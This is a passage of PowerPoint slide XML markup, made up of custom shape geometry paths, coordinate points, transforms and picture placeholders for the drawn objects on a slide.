                    <a:pt x="231051" y="13550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276352" y="36131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327685" y="24079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0E438D16-3918-8B82-7437-AE7DBDD12E1F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6803538" y="2615814"/>
              <a:ext cx="326390" cy="78740"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="326390" h="78739">
                  <a:moveTo>
                    <a:pt x="217453" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="36123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108726" y="78268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326180" y="39134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21745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506DE98D-146B-0FBF-001C-825B75AF17C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6439605" y="2633876"/>
              <a:ext cx="291465" cy="137160"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="291465" h="137160">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="30103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291448" y="136969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291448" y="103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DCDB645E-CC13-1274-F337-C5D7D13B8CDA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6344784" y="2058364"/>
              <a:ext cx="984885" cy="721995"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="85759" y="584338"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="85759" y="613428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382423" y="721797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483845" y="704003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386369" y="704003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381678" y="703587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384079" y="703166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121149" y="607121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="607121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97937" y="598642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="598642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="586745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91071" y="586745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85759" y="584338"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="384079" y="703166"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="381678" y="703587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386369" y="704003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384079" y="703166"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="966145" y="601045"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="384079" y="703166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386369" y="704003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483845" y="704003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="616206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="608626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="608626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="601045"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="973635" y="599731"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="966145" y="601045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="608626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973635" y="599731"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="984267" y="599731"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="973635" y="599731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="608626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="608626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="599731"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="97937" y="598642"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="103880" y="607121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="600813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97937" y="598642"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="103880" y="600813"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="103880" y="607121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121149" y="607121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="600813"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="966145" y="584761"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="966145" y="601045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973635" y="599731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="599731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="586970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="972005" y="586970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="584761"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="103880" y="598642"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="97937" y="598642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="600813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="598642"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="966145" y="578523"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="966145" y="584761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="972005" y="586970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="578523"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="984267" y="578523"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="966145" y="578523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="972005" y="586970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="586970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="578523"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="85759" y="578523"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="85759" y="584338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91071" y="586745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85759" y="578523"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="103880" y="578523"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="85759" y="578523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91071" y="586745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="586745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="578523"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="628148" y="10837"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="609843" y="10837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619427" y="18583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611018" y="19142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675542" y="475208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="584761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="578523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="578523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="572283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706016" y="467382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="692737" y="467382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686959" y="460197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691721" y="460197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628148" y="10837"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="626615" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="595084" y="2107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="106043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69968" y="577184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85759" y="584338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85759" y="578523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="578523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="572707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97187" y="569674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87171" y="569674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81958" y="562775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86146" y="562775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20734" y="122319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11818" y="122319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19217" y="112104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70296" y="112104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597053" y="20088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596776" y="20088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611018" y="19142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609843" y="10837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628148" y="10837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626615" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="81958" y="562775"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="87171" y="569674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86448" y="564809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81958" y="562775"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="86448" y="564809"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="87171" y="569674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97187" y="569674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86448" y="564809"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="86146" y="562775"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="81958" y="562775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86448" y="564809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86146" y="562775"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="686959" y="460197"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="692737" y="467382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691989" y="462093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686959" y="460197"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="691989" y="462093"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="692737" y="467382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706016" y="467382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691989" y="462093"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="691721" y="460197"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="686959" y="460197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691989" y="462093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691721" y="460197"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="19217" y="112104"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11818" y="122319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20509" y="120801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19217" y="112104"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="20509" y="120801"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11818" y="122319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20734" y="122319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20509" y="120801"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="70296" y="112104"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="19217" y="112104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20509" y="120801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70296" y="112104"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="609843" y="10837"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="610939" y="18583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611018" y="19142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619427" y="18583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609843" y="10837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9" name="object 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46FC7B9D-29DB-D2D4-1D6F-9388F8C065D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32054" y="2137174"/>
              <a:ext cx="531553" cy="441011"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="40" name="object 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D088F615-9672-1AF2-FC4C-F03B5C119F5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56788" y="2196384"/>
              <a:ext cx="301918" cy="299719"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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4990B519-0346-610B-96D0-8BC1F4516A4D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6485497" y="2785900"/>
              <a:ext cx="715645" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="23307" y="4084"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65187" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65187" y="76951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23307" y="76951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23307" y="4084"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="114097" y="24160"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="77968" y="45641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75387" y="60756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76069" y="68799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99848" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100059" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108079" y="95679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117735" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123038" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127874" y="95808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136612" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141265" y="92597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146203" y="90606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146203" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112817" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107310" y="79491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99832" y="73822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97800" y="69737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97475" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147483" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147483" y="56753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147201" y="52763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147118" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97414" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97723" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97739" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99243" y="43281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104593" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108143" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143040" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142768" y="37236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139111" y="32572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134406" y="28892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128669" y="26263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122292" y="24777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123253" y="24777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114097" y="24160"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="146203" y="73070"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="143785" y="73070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141265" y="74980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137851" y="76748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129195" y="80080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124725" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146203" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146203" y="73070"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="143040" y="37815"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="116881" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120214" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124501" y="43586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125558" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125639" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125761" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147118" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146958" y="49323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145571" y="43586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145497" y="43281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145385" y="42819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143040" y="37815"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="170486" y="100136"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="167803" y="100136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167803" y="117327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168322" y="117327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171177" y="117997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175139" y="118688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184324" y="119826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188997" y="120111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199543" y="120111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204786" y="119562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214052" y="117327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217994" y="115518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221286" y="112999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224558" y="110540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227098" y="107126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228265" y="104322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187514" y="104322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184570" y="103956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184348" y="103956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176399" y="102148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173148" y="101193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170486" y="100136"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="231649" y="86603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="209744" y="86603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209744" y="90586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209481" y="92841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194565" y="104322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228265" y="104322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230735" y="98389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231570" y="93471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="86603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="195053" y="24404"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="187290" y="24404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183308" y="25196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160529" y="53014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160529" y="58622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160943" y="65673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161013" y="66868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180808" y="93471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194260" y="93471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197816" y="92841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204217" y="90322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207123" y="88635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209596" y="86603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="86603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="76707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192777" y="76707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189140" y="75427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184263" y="70245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183044" y="65673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183106" y="53014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184466" y="48605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190181" y="42062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191487" y="41533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194504" y="40375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="40375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="29321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209622" y="29321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207164" y="27777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204420" y="26578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198406" y="24830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195053" y="24404"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="231649" y="40375"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="201697" y="40375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203323" y="40517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206960" y="41127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208484" y="41533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209744" y="42062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209744" y="72948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208017" y="74086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206087" y="75000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201901" y="76382"/>
                  </a:lnTo>
